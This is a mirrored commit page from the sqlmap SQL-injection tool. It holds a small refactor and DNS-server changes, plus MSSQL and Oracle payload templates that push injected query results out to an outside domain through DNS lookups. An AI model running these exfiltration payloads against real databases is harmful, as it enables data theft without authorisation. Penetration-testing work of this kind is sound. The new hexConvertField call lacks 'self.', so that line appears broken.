sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-02-18 04:20:35 +03:00
Code Issues Packages Projects Releases Wiki Activity

minor update regarding DNS data retrieval task

Browse Source
This commit is contained in:
Miroslav Stampar 2012-04-02 12:22:40 +00:00
parent f7a664b120
commit abffc39929
5 changed files with 35 additions and 11 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

29
lib/core/agent.py
View File

@ -244,8 +244,28 @@ class Agent:
return payload return payload
def getComment(self, request): def getComment(self, request):
"""
Returns comment form for the given request
"""
return request.comment if "comment" in request else "" return request.comment if "comment" in request else ""
def hexConvertField(self, field):
"""
Returns hex converted field string
"""
rootQuery = queries[Backend.getIdentifiedDbms()]
hexField = field
if 'hex' in rootQuery:
hexField = rootQuery.hex.query % field
else:
warnMsg = "switch '--hex' is currently not supported on DBMS '%s'. " % Backend.getIdentifiedDbms()
singleTimeWarnMessage(warnMsg)
return hexField
def nullAndCastField(self, field): def nullAndCastField(self, field):
""" """
Take in input a field string and return its processed nulled and Take in input a field string and return its processed nulled and
@ -288,14 +308,7 @@ class Agent:
nulledCastedField = rootQuery.isnull.query % nulledCastedField nulledCastedField = rootQuery.isnull.query % nulledCastedField
if conf.hexConvert: if conf.hexConvert:
if 'hex' in rootQuery: nulledCastedField = hexConvertField(nulledCastedField)
nulledCastedField = rootQuery.hex.query % nulledCastedField
else:
warnMsg = "switch '--hex' is currently not supported on DBMS '%s'. " % Backend.getIdentifiedDbms()
warnMsg += "Going to switch it off"
singleTimeWarnMessage(warnMsg)
conf.hexConvert = False
return nulledCastedField return nulledCastedField

2
lib/core/common.py
View File

@ -1608,7 +1608,7 @@ def getSPLSnippet(dbms, name, **variables):
checkFile(filename) checkFile(filename)
retVal = readCachedFileContent(filename) retVal = readCachedFileContent(filename)
retVal = re.sub(r"#.+", "", retVal) retVal = re.sub(r"#.+", "", retVal).strip()
for _ in variables.keys(): for _ in variables.keys():
retVal = re.sub(r"%%%s%%" % _, variables[_], retVal) retVal = re.sub(r"%%%s%%" % _, variables[_], retVal)

11
lib/request/dns.py
View File

@ -8,6 +8,7 @@ See the file 'doc/COPYING' for copying permission
""" """
import os import os
import re
import socket import socket
import threading import threading
import time import time
@ -63,6 +64,16 @@ class DNSServer:
retVal = self._requests.pop(0) retVal = self._requests.pop(0)
return retVal return retVal
def pop(self, prefix, suffix):
retVal = None
with self._lock:
for _ in self._requests:
if re.search("%s\..+\.%s" % (prefix, suffix), _, re.I):
retVal = _
self._requests.remove(_)
break
return retVal
def run(self): def run(self):
def _(): def _():
try: try:

2
procs/mssqlserver/dns_request.txt
View File

@ -1,3 +1,3 @@
DECLARE @host varchar(1024); DECLARE @host varchar(1024);
SELECT @host = '%PREFIX%' + (%QUERY%) + '%SUFFIX%' + '.%DOMAIN%'; SELECT @host = '%PREFIX%.' + (%QUERY%) + '.%SUFFIX%' + '.%DOMAIN%';
EXEC('xp_fileexist "\' + @host + 'c$boot.ini"'); EXEC('xp_fileexist "\' + @host + 'c$boot.ini"');

2
procs/oracle/dns_request.txt
View File

@ -1 +1 @@
SELECT UTL_INADDR.GET_HOST_ADDRESS('%PREFIX%'||(%QUERY%)||'%SUFFIX%'||'.%DOMAIN%') FROM DUAL SELECT UTL_INADDR.GET_HOST_ADDRESS('%PREFIX%.'||(%QUERY%)||'.%SUFFIX%'||'.%DOMAIN%') FROM DUAL